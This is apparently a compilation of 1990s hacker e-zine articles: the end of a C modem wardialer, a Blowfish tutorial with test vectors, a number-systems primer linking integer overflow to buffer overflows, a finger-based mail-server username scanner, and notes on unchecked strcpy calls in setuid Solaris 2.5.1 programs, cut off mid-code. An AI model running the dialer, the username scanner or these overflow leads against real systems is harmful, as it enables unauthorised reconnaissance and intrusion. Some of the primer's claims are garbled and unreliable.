printf("Dialing 1-%d-%d-%d.\n", First3Digits, Last3Digits, ScanMin);
numbytes = write(fd, phonenum1, strlen(phonenum1));
check_for_error(fd, numbytes, "write");
}

else { /* if random == 1 */
printf("Dialing 1-%d-%d-%d.\n", First3Digits, Last3Digits, ScanMin);
numbytes = write(fd, phonenum1, strlen(phonenum1));
check_for_error(fd, numbytes, "write");
}

sleep(TIMEOUT); /* How long to wait for timeout */

numbytes = read(fd, buf, 511);
check_for_error(fd, numbytes, "read");

/* Compare the string with "CONNECT" */
if((strncmp(buf, "CONNECT", 7)) == 0) {
fputc('\a', stderr);
fprintf(stderr, "*** CONNECT *** to 1-%d-%d-%d\n", First3Digits, Last3Digits, ScanMin);

/* Log it */
sprintf(connectmsg, "*** CONNECT *** to 1-%d-%d-%d\n", First3Digits, Last3Digits, ScanMin);
fputs(connectmsg, logfile);

bzero(connectmsg, 50); /* Clear the message */
}

bzero(buf, 512); /* Reset buffer */

hangup();

if (random != 1) {

/* Increase ScanMin so it scans for the next number */
ScanMin += 1;

if (ScanMin > ScanMax) {
fputc('\a', stderr);
fprintf(stderr, "ALL DONE SCANNING....THANKS FOR USING\n");
break;
}

}

bzero(phonenum, 20); /* Clear the phone number */
bzero(phonenum1, 20); /* Ditto */


} /* End of while loop */
} /* End of if/else loop */

fclose(logfile);
} /* End of dial_num */

void hangup(void)
{
/* After testing put this in the init_modem() section */
/* for optimize it. */

int fd1; /* fd for modem (hang up) */

fd1=open(HANGUPPORT, O_RDWR | O_NOCTTY | O_NDELAY);
if (fd1 == ERROR) {
perror("open");
close(fd1);
close(fd);
exit(ERROR);
}

numbytes=write(fd1, "+++\r", 4);
check_for_error(fd1, numbytes, "write");

sleep(1);

numbytes=write(fd1, "ATH\r", 4);
check_for_error(fd1, numbytes, "write");

sleep(3);

/* Should/will check for "OK */
close(fd1);

}

void sighandler(int signum)
{
    char message[50];

    fprintf(stderr, "Receive signal to quit....closing up modem, logging last number dialed,\nand exitting\n");
    if (random != 1) fprintf(stderr, "Last number dialed was: ");

    if((strncasecmp(LocalOrLong, "L", 1)) == 0) {
        if (random != 1) {
            /* a local number is First3Digits-ScanMin; Last3Digits is */
            /* only set for long distance */
            sprintf(message, "%d-%d\n", First3Digits, ScanMin);
            /* fputs() so the message is never treated as a format string */
            fputs(message, stderr);
            fputs(message, logfile);
            /* fprintf(resume, "%d%d\n", First3Digits, ScanMin); */
        }
    }
    else { /* if LocalOrLong == "D" */
        if (random != 1) {
            sprintf(message, "1-%d-%d-%d\n", First3Digits, Last3Digits, ScanMin);
            fputs(message, stderr);
            fputs(message, logfile);
            /* fprintf(resume, "1%d%d%d\n", First3Digits, Last3Digits, ScanMin); */
        }
    }

    /* hangup(); */
    close(fd);
    /* fclose(resume); */
    fclose(logfile);
    exit(ERROR);
}

/* void resume(void)
{

}
*/

-----------
validate.c
-----------

/* Functions: */
/* local_validnum */
/* long_validnum */

#include <stdio.h>
#include <unistd.h>

#define ERROR -1

/* Check if it was a valid local number */
void local_validnum(int digits)
{

if ((digits > 111) && (999 > digits)) {
/* Do nothing */
}
else {
fprintf(stderr, "%d is invalid.\nThe number must be 111-999\n", digits);
exit(ERROR);
}

}

void long_validnum(int firstdigits, int lastdigits)
{
if (((firstdigits > 111) && (firstdigits < 999)) && ((lastdigits > 111) && (lastdigits < 999))) {
/* Do nothing */
}
else {
fprintf(stderr, "%d%d is invalid.\nThe number must 111111-999999\n", firstdigits, lastdigits);
exit(1);
}


}

---------
errors.c
---------


/* Functions: */
/* check_for_error */

#include <unistd.h>
#include <stdio.h>

#define ERROR -1

void check_for_error(int fd, int num, char *s)
{
if (num == ERROR) {
fprintf(stderr, "Error: Unable to %s all the bytes.\n", s);
hangup();
close(fd);
exit(ERROR);
}

}


ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
The Blowfish Algorithm: A Look Under The Hood
by The Messiah

Contents
* Introduction
* Key Setup
* Encryption
* Decryption
* Review
* Test Vectors


INTRODUCTION: The Blowfish encryption algorithm is one of the most well-known
encryption algorithms in the public domain. It was written by noted
cryptologist Bruce Schneier, and placed in the public domain in 1994. It uses
a variable-size key (from 32 to 448 bits), has a 64-bit blocksize, and
encrypts the plaintext 16 times, or "rounds." It is a symmetric algorithm,
meaning the key used to encrypt is the same key used to decrypt. It was
designed to run best in software implementations, as opposed to DES, which
was designed to run in hardware implementations.

KEY SETUP: Blowfish has a complex key setup required before any encryption or
decryption can be done. This is the most complicated part of the algorithm.

P-array: The P array is an array of 18 32-bit entries- array[1..18] of
LongInt;
S-Boxes: There are 4 S-boxes, each with 256 32-bit entries-
array[0..255] of LongInt;

1.) Initialize the P-array and S-boxes in order with the hexadecimal
digits of Pi, starting from the .1 place.

(* each table continues where the previous one ended: *)
(* 1 + 18 = 19, 19 + 256 = 275, 275 + 256 = 531, 531 + 256 = 787 *)
for i := 1 to 18 do
  Parray[i] := GetPiDigit(i);
for i := 0 to 255 do
  SBox1[i] := GetPiDigit(i+19);
for i := 0 to 255 do
  SBox2[i] := GetPiDigit(i+275);
for i := 0 to 255 do
  SBox3[i] := GetPiDigit(i+531);
for i := 0 to 255 do
  SBox4[i] := GetPiDigit(i+787);

2.) Cycle through the P-array, XORing the entry with a 32-bit value
from the passphrase.

PassStr : String;
data : LongInt;
k : Byte;

(* Each P-array entry is XORed with the next four passphrase bytes, *)
(* first byte in the top 8 bits, starting over at the beginning of *)
(* the passphrase whenever its end is reached. *)
k := 1;
for i := 1 to 18 do
begin
  data := 0;
  for j := 1 to 4 do
  begin
    data := (data shl 8) or Ord(PassStr[k]);
    Inc(k);
    if k > Length(PassStr) then k := 1;
  end;
  Parray[i] := Parray[i] xor data;
end;

3.) Encrypt an all-zero string with the current S-boxes and replace
P-array[1] and P-array[2] with the value. (See the encryption
section for more info)

zeros : TCipherBlock;

zeros[0] := 0;
zeros[1] := 0;
zeros := Encrypt(zeros);
Parray[1] := zeros[0];
Parray[2] := zeros[1];

4.) Fill the rest of the P-array and S-boxes in order, using the
output of the encrypted string, changing the string to the
last encrypted one:

i := 3;
while i < 18 do (* i takes the odd values 3..17, so "<> 18" would never stop *)
begin
  zeros := Encrypt(zeros);
  Parray[i] := zeros[0];
  Parray[i+1] := zeros[1];
  Inc(i,2);
end;

i := 0;
while i < 255 do (* i takes the even values 0..254 *)
begin
  zeros := Encrypt(zeros);
  SBox1[i] := zeros[0];
  SBox1[i+1] := zeros[1];
  Inc(i,2);
end;

and so on....


ENCRYPTION: Encryption is done with two parts- the main part, and the F
function.

1.) The F function divides the left half of a cipherblock
(a 32-bit value) into four values and encrypts them with
the S-boxes.

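function F_Funct(Input : LongInt) : LongInt;
var
  a, b, c, d : Byte;
begin
  a := (Input shr 24) and $FF; (* most significant byte *)
  b := (Input shr 16) and $FF;
  c := (Input shr 8) and $FF;
  d := Input and $FF; (* least significant byte *)
  (* both additions are taken mod 2^32 *)
  F_Funct := ((SBox1[a] + SBox2[b]) xor SBox3[c]) + SBox4[d];
end;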


2.) The main part encrypts a 64-bit long block (two LongInts):

type
TCipherBlock = array[0..1] of LongInt;

function Encrypt(Input : TCipherBlock) : TCipherBlock;
var
  I : Byte;
  bin : LongInt;
  foo : TCipherBlock;
begin
  foo := Input;
  for i := 1 to 16 do (* number of rounds *)
  begin
    foo[0] := foo[0] xor Parray[i];
    foo[1] := F_Funct(foo[0]) xor foo[1];
    bin := foo[0]; (* swap the two halves *)
    foo[0] := foo[1];
    foo[1] := bin;
  end;
  bin := foo[0]; (* undo the swap made by the last round *)
  foo[0] := foo[1];
  foo[1] := bin;
  foo[1] := foo[1] xor Parray[17]; (* the last two entries are used once, *)
  foo[0] := foo[0] xor Parray[18]; (* after the rounds *)
  Encrypt := foo;
end;

DECRYPTION: Decryption is the same as encryption, except it uses the
P-array backwards.

1.) Decryption function:

function Decrypt(Input : TCipherBlock) : TCipherBlock;
var
  I : Byte;
  bin : LongInt;
  foo : TCipherBlock;
begin
  foo := Input;
  for i := 18 downto 3 do (* the same 16 rounds, P-array read backwards *)
  begin
    foo[0] := foo[0] xor Parray[i];
    foo[1] := F_Funct(foo[0]) xor foo[1];
    bin := foo[0]; (* swap the two halves *)
    foo[0] := foo[1];
    foo[1] := bin;
  end;
  bin := foo[0]; (* undo the swap made by the last round *)
  foo[0] := foo[1];
  foo[1] := bin;
  foo[1] := foo[1] xor Parray[2];
  foo[0] := foo[0] xor Parray[1];
  Decrypt := foo;
end;

REVIEW:
Ahh, how I love being a critic. Blowfish is one of my favorite
algorithms, simply because it has the largest key size, is VERY fast, and is
public domain. It is relatively new, but so far all cryptanalysis has found no
real flaws. The only thing I know of is a slight weakness in 14-round
variants of Blowfish, but most, if not all, implementations of Blowfish use
the 16-round specs. Blowfish is simple, fairly easy to implement (the only
hard part for me was finding all those digits of Pi), and VERY VERY fast. In
a recent speed test using an optimized implementation of Blowfish, it used
only 18 cycles per encrypted byte. Since it is one of the newer algorithms,
it was designed with modern computing power in mind, unlike DES, which has
fallen to brute force attacks. It's also in the public domain, unlike IDEA,
so you may use it in a commercial application without having to pay
royalties. I would use this over most other algorithms for communication
(in CFB mode), or file storage, unless speed was the highest priority.

TEST VECTORS: Should you be making your own implementation of Blowfish,
here's Eric Young's test vectors-

All data is shown as a hex string with 012345 loading as
data[0]=0x01;
data[1]=0x23;
data[2]=0x45;
ecb test data (taken from the DES validation tests)

key bytes clear bytes cipher bytes
0000000000000000 0000000000000000 4EF997456198DD78
FFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFF 51866FD5B85ECB8A
3000000000000000 1000000000000001 7D856F9A613063F2
1111111111111111 1111111111111111 2466DD878B963C9D
0123456789ABCDEF 1111111111111111 61F9C3802281B096
1111111111111111 0123456789ABCDEF 7D0CC630AFDA1EC7
0000000000000000 0000000000000000 4EF997456198DD78
FEDCBA9876543210 0123456789ABCDEF 0ACEAB0FC6A0A28D
7CA110454A1A6E57 01A1D6D039776742 59C68245EB05282B
0131D9619DC1376E 5CD54CA83DEF57DA B1B8CC0B250F09A0
07A1133E4A0B2686 0248D43806F67172 1730E5778BEA1DA4
3849674C2602319E 51454B582DDF440A A25E7856CF2651EB
04B915BA43FEB5B6 42FD443059577FA2 353882B109CE8F1A
0113B970FD34F2CE 059B5E0851CF143A 48F4D0884C379918
0170F175468FB5E6 0756D8E0774761D2 432193B78951FC98
43297FAD38E373FE 762514B829BF486A 13F04154D69D1AE5
07A7137045DA2A16 3BDD119049372802 2EEDDA93FFD39C79
04689104C2FD3B2F 26955F6835AF609A D887E0393C2DA6E3
37D06BB516CB7546 164D5E404F275232 5F99D04F5B163969
1F08260D1AC2465E 6B056E18759F5CCA 4A057A3B24D3977B
584023641ABA6176 004BD6EF09176062 452031C1E4FADA8E
025816164629B007 480D39006EE762F2 7555AE39F59B87BD
49793EBC79B3258F 437540C8698F3CFA 53C55F9CB49FC019
4FB05E1515AB73A7 072D43A077075292 7A8E7BFA937E89A3
49E95D6D4CA229BF 02FE55778117F12A CF9C5D7A4986ADB5
018310DC409B26D6 1D9D5C5018F728C2 D1ABB290658BC778
1C587F1C13924FEF 305532286D6F295A 55CB3774D13EF201
0101010101010101 0123456789ABCDEF FA34EC4847B268B2
1F1F1F1F0E0E0E0E 0123456789ABCDEF A790795108EA3CAE
E0FEE0FEF1FEF1FE 0123456789ABCDEF C39E072D9FAC631D
0000000000000000 FFFFFFFFFFFFFFFF 014933E0CDAFF6E4
FFFFFFFFFFFFFFFF 0000000000000000 F21E9A77B71C49BC
0123456789ABCDEF 0000000000000000 245946885754369A
FEDCBA9876543210 FFFFFFFFFFFFFFFF 6B5C5A9C5D9E0A5A

set_key test data
data[8]= FEDCBA9876543210
c=F9AD597C49DB005E k[ 1]=F0
c=E91D21C1D961A6D6 k[ 2]=F0E1
c=E9C2B70A1BC65CF3 k[ 3]=F0E1D2
c=BE1E639408640F05 k[ 4]=F0E1D2C3
c=B39E44481BDB1E6E k[ 5]=F0E1D2C3B4
c=9457AA83B1928C0D k[ 6]=F0E1D2C3B4A5
c=8BB77032F960629D k[ 7]=F0E1D2C3B4A596
c=E87A244E2CC85E82 k[ 8]=F0E1D2C3B4A59687
c=15750E7A4F4EC577 k[ 9]=F0E1D2C3B4A5968778
c=122BA70B3AB64AE0 k[10]=F0E1D2C3B4A596877869
c=3A833C9AFFC537F6 k[11]=F0E1D2C3B4A5968778695A
c=9409DA87A90F6BF2 k[12]=F0E1D2C3B4A5968778695A4B
c=884F80625060B8B4 k[13]=F0E1D2C3B4A5968778695A4B3C
c=1F85031C19E11968 k[14]=F0E1D2C3B4A5968778695A4B3C2D
c=79D9373A714CA34F k[15]=F0E1D2C3B4A5968778695A4B3C2D1E
c=93142887EE3BE15C k[16]=F0E1D2C3B4A5968778695A4B3C2D1E0F
c=03429E838CE2D14B k[17]=F0E1D2C3B4A5968778695A4B3C2D1E0F00
c=A4299E27469FF67B k[18]=F0E1D2C3B4A5968778695A4B3C2D1E0F0011
c=AFD5AED1C1BC96A8 k[19]=F0E1D2C3B4A5968778695A4B3C2D1E0F001122
c=10851C0E3858DA9F k[20]=F0E1D2C3B4A5968778695A4B3C2D1E0F00112233
c=E6F51ED79B9DB21F k[21]=F0E1D2C3B4A5968778695A4B3C2D1E0F0011223344
c=64A6E14AFD36B46F k[22]=F0E1D2C3B4A5968778695A4B3C2D1E0F001122334455
c=80C7D7D45A5479AD k[23]=F0E1D2C3B4A5968778695A4B3C2D1E0F00112233445566
c=05044B62FA52D080 k[24]=F0E1D2C3B4A5968778695A4B3C2D1E0F0011223344556677

chaining mode test data
key[16] = 0123456789ABCDEFF0E1D2C3B4A59687
iv[8] = FEDCBA9876543210
data[29] = "7654321 Now is the time for " (includes trailing '\0')
data[29] = 37363534333231204E6F77206973207468652074696D6520666F722000
cbc cipher text
cipher[32]= 6B77B4D63006DEE605B156E27403979358DEB9E7154616D959F1652BD5FF92CCE7
cfb64 cipher text
cipher[29]= E73214A2822139CAF26ECF6D2EB9E76E3DA3DE04D1517200519D57A6C3
ofb64 cipher text
cipher[29]= E73214A2822139CA62B343CC5B65587310DD908D0C241B2263C2CF80DA

ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
Learning to Count All Over Again
by Bronc Buster
(ww.showdown.org)
(bbuster@succeed.net)

When I read 2600 I see a lot of the other readers are young people, and
a lot of them are clueless about what makes this world go around. Well
for anyone who's been to my site or talked to me, they know that I like
to break down things into layman's terms. So anyone that might read
what I write, will come away with an understanding of the subject
rather than learning a ton of new acronyms and their eyes glazing
over as they pass out. Well this article is going to focus on numbers
and how to count with them among other things. I know what you're
thinking, but read on, as I'm not talking about 1 + 1 = 2. I'm
talking complex number systems using different bases of numbers
and sometimes using letters instead of numbers. I'm talking about
getting down to the computer level and why this is so important.

Computers talk with numbers. Zeros, 0, and Ones, 1. Over time we
have figured out ways to get them to understand Base 8, or Octal
numbers, and Base 16 numbers, Hexadecimal, or HEX as it's more
well known as, but they are still based on the 0 and the 1. Well
let's start with the basics and move on from there. How do we
count in Binary, with 0 and 1? Heck with only 2 numbers how are
you going to make a number like 27? In Assembly classes they
teach a column method to learn how to count and I like it, so
I'll use it too.

So here we go, I'll briefly go over the 3 different number systems,
show you how to read them with a chart and what their bases are
along with the number and symbols they use to function. Then I'll
show you how they sign numbers to show positive and negative numbers,
along with basic adding and subtracting. Then to wrap it up I'll tell
you why it's very important for anyone in the hacking scene to
understand these very basic operations and what usage it has
(can you say Buffer Overflow?).

Counting Binary
------------------

Binary is the basic low level 0 and 1, the only two things a computer
can really understand. It's like an on and off switch, that's all it
can do. So they came up with patterns of 0 and 1 that stood for other
numbers so we could count and perform other operations all based on
the power system for the number 2. Read 2^3 is 2 raised to the 3rd
power, or 8, the top row of numbers.

16     8     4     2     1

2^4 | 2^3 | 2^2 | 2^1 | 2^0
----------------------------------------     binary = base 10
                         0 =  0                   0 = 0
                         1 =  1                   1 = 1
                   1     0 =  2                 1 0 = 2
                   1     1 =  3                 1 1 = 3
             1     0     0 =  4               1 0 0 = 4
             1     0     1 =  5               1 0 1 = 5
             1     1     0 =  6               1 1 0 = 6
             1     1     1 =  7               1 1 1 = 7
       1     0     0     0 =  8             1 0 0 0 = 8
       1     0     0     1 =  9             1 0 0 1 = 9
       1     0     1     0 = 10             1 0 1 0 = 10


As you see, it's simple enough after you get the patterns down,
and if you notice, it's repeating. After going through the cycle,
you add another 1 to the end and repeat the cycle for the new ending
1. It may take some time getting used to reading it, but after a few
minutes you can pick it up pretty easily. Well this is all fine and
dandy, now you can read binary, so let's move on to base 8, or octal.

Counting Octal
------------------

Well since binary is base 2, and octal is base 8 we need a new set of
numbers. Remember binary has 2 numbers, 0 and 1, octal therefore must
have 8; 0,1,2,3,4,5,6,7. Much like binary we can make a column chart
to read these numbers.

4096  512    64     8     1

8^4 | 8^3 | 8^2 | 8^1 | 8^0
-------------------------------------------
                         0 =  0
                         1 =  1
                         2 =  2
                         3 =  3
                         4 =  4
                         5 =  5
                         6 =  6
                         7 =  7
                   1     0 =  8
                   1     1 =  9
                   1     2 = 10
             1     1     6 = 78

Notice that the octal numbers are cubes of the binary numbers, since
2^3 is 8, i.e. 64 = 8^2 or (2^3)^2. This comes in handy when you can't
remember a conversion or the number is really weird. As you may have
guessed, or may not have, octal numbers use up 8 bits per number, because
they are ultimately stored as zeros and ones. The number 7 in octal is
just 7, but to store it it takes 8 bits, or 00000111.

Counting Hexadecimal
-----------------------

Hexadecimal, or HEX as it's better known, is base 16. Now as you gather
from octal numbers, when you change bases you need a new set of numbers
to count with. Base 16 has 16 numbers, like octal has 8 and binary has
2. They are: 0,1,2,3,4,5,6,7,8,9,A,B,C,D,E,F. Why A-F instead of maybe
something else? Well the letters A-F are well known and are in order,
so for simplicity the makers of HEX used them. Like octal and binary we
can use a column chart to count in HEX.


4096    256     16      1

16^3 | 16^2 | 16^1 | 16^0
-------------------------------------------
                       0 =   0
                       1 =   1
                       2 =   2
                       3 =   3
                       4 =   4
                       5 =   5
                       6 =   6
                       7 =   7
                       8 =   8
                       9 =   9
                       A =  10
                       B =  11
                       C =  12
                       D =  13
                       E =  14
                       F =  15
                1      0 =  16
                1      1 =  17
                1      E =  30
                8      5 = 133

As you can see, HEX is a little more complicated and takes practice to
get used to. Even when you can effectively understand the numbers,
sometimes you still need a calculator or a program, like a HEX editor
to read them because of their sizes and complexities.

Quick Lesson on Conversions
------------------------------

I know that a natural question has to be if there is an easier way
to convert between the bases, and luckily there is. I'll give a quick
lesson, as it's pretty simple. Binary numbers can be 1 bit, and octal
numbers can be made up from 3 bits of binary. HEX, likewise, can be made
from 4 bits of binary. It's easier to show:

Let's say we have a number, 62. In binary it's: 0 1 1 1 1 1 0, and
to convert to octal, we group it into 3 bit segments, from the right,
and read it: 0 (1 1 1) (1 1 0). We can ignore the leading 0. So
in octal we read it in binary, 1 1 1 = 7, and 1 1 0 = 6, so in octal
it's 76.

Let's use 62 again and find HEX. This time we group in 4s, from the
right, like so: (0 1 1) (1 1 1 0). Since the first group has only 3
bits we can add a leading 0, but it will not make any difference to
the outcome. Read the groups, 0 1 1 = 3, and 1 1 1 0 = E, so in HEX
it's 3E.

0 1 1 1 1 1 0 - Binary
0 ( 1 1 1 ) ( 1 1 0 ) - Octal
( 0 1 1 ) ( 1 1 1 0 ) - Hex

If you're clever you can figure out how to convert from any of the 3
to any of the others with minimal effort.


Signed Numbers
------------------

How do computers know if a number is positive or negative if all it
sees is zeros and ones? Well for the purpose of this article I'll keep
it simple and use binary, as octal and HEX can get very complex. Before
we go any further I have to explain what complementary systems are as
we are going to be using base complements to determine signs.

A base complement is when you take the largest number in a numbering
system and subtract from it. For example, say we are in normal everyday
base 10, and we have the number 1267. If we want to find its complement
we would take the largest number in base 10's number system, a 9, and
subtract each number from it.

  9999
- 1267
------
  8732

So 8732 is the complement to 1267. Let's try binary. Since binary is
base 2, then the largest number is 1. Say we have the number, 62 again,
in binary, 0 1 1 1 1 1 0, let's find its complement.

  1111111
- 0111110
---------
  1000001 = 37

So we see that 37, or 1 0 0 0 0 0 1, is the complement to 62,
or 0 1 1 1 1 1 0. Using complements we can sign a number as negative
or positive.

How? Well all positive numbers will be in true form, like 62 will
be 0 1 1 1 1 1 0, but if we had a negative 62, we would use its
complement, or 1 0 0 0 0 0 1. "Hold on" you say, "1 0 0 0 0 1 is 37!".
Not anymore, as binary numbers use a signed bit, or the first bit to
determine if a number is positive or negative. The first bit is used
to tell this, if it's a 1 it's signed negative, if it's a 0 it's signed
positive. So how do we get 37? Add a leading 0, 0 1 0 0 0 0 0 1; now
that's 37 and 1 0 0 0 0 0 1 is a negative 62. Once the computer sees
the leading bit is a 1, it knows it's dealing with a negative number.
An easy way to remember how it works: if the first bit is a 1, then
find out what the column value is for that bit, so in 62 the first bit
would be a 64, or 2^6. Since the binary number 0 1 0 0 0 0 0 0 is 64,
and 0 1 1 1 1 1 1 1 is 63, then if we use 1 0 0 0 0 0 1 as negative 62
we can think of the first slot as a negative number, or the first bit
as the negative and everything else positive. Say the first bit is
a negative 64 instead of a positive 64, then subtract 1 because we
are in reverse, then subtract for each other 1, the number of that
column, so in this example, we would subtract 1 more for the 1 in
the first column giving us negative 62.

It can get complicated, but it just takes a little practice. Why practice?
Why care about all this crap? Beside the fact it will help you later on
down the road for those of you planning on going to college to continue
your schooling in computers, it's very helpful in hacking to know this too.

The Buffer Overflow
------------------------

I'm going to make a very simple example of what a buffer overflow is
and how it happens and what it has to do with all these numbers and
number systems. Well for this article's purpose let's use a very
simplistic 4 bit number in binary. As some of you know modern buffer
overflow attacks are in HEX, or as the exploit code calls it, Assembly,
which is actually wrong. Ok, say we have a number, and we want to do
some addition, the numbers 3 and 6 using 4 bits.

  0 1 1 0 =  6
+ 0 0 1 1 =  3
------------
  1 0 0 1 = -7

Hold on, 3 + 6 = -7? In 4 bits the computer thinks that this number
is 9, but 4 bits can't hold the number 9, and it comes up with negative
7. Whammo! Buffer Overflow.

Most computers from the 8086 and up have a flag that indicates if a
buffer overflow has occurred or not, but if the code has not been
carefully designed, skillful coders can find and exploit code that
is vulnerable, and they do every day. Filling up buffers with numbers
in HEX that are larger than a buffer was designed to handle, crashing
programs, racing for root.
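
The 3 + 6 addition above, worked through in code for any register width,
together with the flag the CPU sets and a checked add that refuses instead
of wrapping. This is an added example, not part of the original article; the
names add_nbit, to_signed and checked_add_nbit are made up for it, and it
assumes widths of 2 to 16 bits.

```c
#include <stdio.h>

/* Outcome of adding two numbers in an n-bit two's complement register. */
struct add_result {
    unsigned raw;      /* the n-bit pattern left in the register        */
    int      value;    /* that pattern read as a signed number          */
    int      carry;    /* carry out of the top bit (unsigned wrap)      */
    int      overflow; /* signed overflow: the result's sign is wrong   */
};

/* Read the low `bits` bits of raw as a signed two's complement number. */
static int to_signed(unsigned raw, int bits)
{
    unsigned mask = (1u << bits) - 1u;
    unsigned sign = 1u << (bits - 1);

    raw &= mask;
    return (raw & sign) ? (int)raw - (int)(1u << bits) : (int)raw;
}

/* Add a and b the way a `bits`-wide register would, keeping the flags. */
static struct add_result add_nbit(int a, int b, int bits)
{
    unsigned mask = (1u << bits) - 1u;
    unsigned sign = 1u << (bits - 1);
    unsigned ua = (unsigned)a & mask;
    unsigned ub = (unsigned)b & mask;
    unsigned sum = ua + ub;
    struct add_result r;

    r.raw = sum & mask;
    r.value = to_signed(r.raw, bits);
    r.carry = (int)((sum >> bits) & 1u);
    /* Overflow happens only when both inputs share a sign bit and the
     * result's sign bit differs from it. */
    r.overflow = ((~(ua ^ ub) & (ua ^ r.raw)) & sign) != 0;
    return r;
}

/* Checked add: test the range BEFORE adding. Returns 0 and stores the sum
 * in *out when it fits in `bits` bits, -1 when it would not. */
static int checked_add_nbit(int a, int b, int bits, int *out)
{
    int min = -(1 << (bits - 1));
    int max = (1 << (bits - 1)) - 1;

    if (a < min || a > max || b < min || b > max)
        return -1;
    if ((b > 0 && a > max - b) || (b < 0 && a < min - b))
        return -1;
    *out = a + b;
    return 0;
}

int main(void)
{
    struct add_result r = add_nbit(6, 3, 4);
    int sum;

    printf("6 + 3 in 4 bits: raw=0x%X value=%d carry=%d overflow=%d\n",
           r.raw, r.value, r.carry, r.overflow);

    r = add_nbit(-1, 1, 4);   /* carry out, but the signed answer is right */
    printf("-1 + 1 in 4 bits: raw=0x%X value=%d carry=%d overflow=%d\n",
           r.raw, r.value, r.carry, r.overflow);

    if (checked_add_nbit(6, 3, 4, &sum) != 0)
        printf("checked add refused 6 + 3 in 4 bits\n");
    if (checked_add_nbit(3, 4, 4, &sum) == 0)
        printf("checked add allowed 3 + 4 = %d\n", sum);
    return 0;
}
```

Code that sizes a buffer from a sum or a product needs the checked form,
because the wrapped value looks like any other number once it is stored.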

Conclusions
----------------

I hope I've made clear how to understand binary, octal and HEX number
systems; how to read them, how to manipulate them back and forth, and
how they sign numbers so one may perform basic mathematical operations.
I also hope, if you learned anything, is how important it is to
understand these number systems and how they tie into hacking and
your future down the road.

I am a firm believer that if you learn the basics then the hard stuff
will be easy....

Bronc Buster!!!

Thanks to RLoxley, NeTJaMMr and Perhillion for helping proof this.

[EOF]

ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
Mail server username scanner - scan.c
by memor

/* Make a usernames lists from a file, to an host, via Fingers..
for any use..
example:
scan userfile mail.server.to.scan.net

or to save it in an output file :
scan userfile mail.server.to.scan.net > result

have fun with that little thing...

memor/hbs - sjta
*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* characters allowed in a username or host before it reaches system() */
#define SAFE_CHARS "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789._-"

int main(int argc, char *argv[])
{
    /* define file handle , strings */

    FILE *nombre1;

    char nom[30];        /* username read from the file */
    char commande[128];  /* "finger user@host" command line */
    char dnsip[50];      /* host to query */

    int fin;
    int test;

    fin = 0;

    /* do we have enough arguments ? no ? */

    if (argc < 3)
    {
        printf("Scans for usernames with finger.. memor(hbs/sjta) \nusage : %s userfile host\n", argv[0]);

        /* ok bye.. not enough arguments */

        exit(1);
    }

    /* we have enough.. we can now work :) */

    nombre1 = fopen(argv[1], "r");

    /* can we open that file ? */

    if (nombre1 == NULL)
    {
        printf("Can't open the file!!\n");

        /* no? ok bye.. :) */

        exit(1);
    }

    /* saving some arguments and hiding the programm */

    snprintf(dnsip, sizeof(dnsip), "%s", argv[2]);
    sprintf(argv[0], "joe ");
    sprintf(argv[1], " ");
    sprintf(argv[2], " ");

    /* the host ends up on a shell command line: refuse anything odd */

    if (dnsip[0] == '\0' || dnsip[strspn(dnsip, SAFE_CHARS)] != '\0')
    {
        printf("Bad host name!!\n");
        fclose(nombre1);
        exit(1);
    }

    /* while we reach the end of file :) */

    while (fin != 1)
    {
        /* i catch the username (29 chars max) and test for the end of file */

        test = fscanf(nombre1, "%29s", nom);

        if (test == EOF) fin = 1;
        else if (nom[strspn(nom, SAFE_CHARS)] != '\0')
        {
            /* same rule for every name read from the file */

            printf("Skipping [%s] ..\n", nom);
        }
        else
        {
            /* i attempt a finger to see if we got an existant username */

            snprintf(commande, sizeof(commande), "finger %s@%s", nom, dnsip);
            printf("Scanning for [%s] ..\n%s\n", nom, commande);
            system(commande);
        }
    }

    /* closing input file of usernames */

    fclose(nombre1);
    return 0;
}

ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
Vuls in Solaris 2.5.1
by Shok

Although there are vulnerabilities known in rlogin and chkey, these are
unrelated to them.

rlogin:
They have the following code (which is pathetic might I add):

char *p;
char term[256];
[...]
p=getenv("TERM");
[...]
strcpy(term, p);

Yah there is Sun's super security.......... sheesh the obvious fix would
be a simple strncpy but NO they had to do it the secureless way ;)

arp:
Well this is the gethostbyname() vulnerability in solaris 2.5.0 and 2.5.1
Now as most people know, there was a vulnerability in gethostbyname, and
its sploit used rlogin. Well.....if they chmod -s'd rlogin (which would
break it anyway), you could still use arp, as it is suid (although
occasionally I set it sgid instead). This is a shortened version of the
code:

if (argc == 2) {
get(argv[1]);
exit(0);
}

get(host)
char *host
{
[...]
hp = gethostbyname(host);

More great ol' Sun security eh? The sploit code for this is just a
modified gethostbyname sploit.

chkey:
gee let's look at this one.......
char program_name[256];
strcpy(program_name, argv[0]);

WAHOO!!! THE BEST ONE YET!
Once again great job sun......

Although I should make it clear I do like Sun.....but they are really
ignorant assuming people won't get ahold of the source so they don't have
to use proper bounds checking....I mean that should be like common sense.

That's all I am going to mention.....although I will give a few....
I'm looking at cu and uucp which appear to have an overflow in their
remote host and commands.......to test this you ought to just make a
generic program:

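#include <stdio.h>
#include <stdlib.h>

int main(int argc, char **argv)
{
    unsigned long int i;
    unsigned long int num;

    /* the only argument is how many characters to print */
    if (argc < 2)
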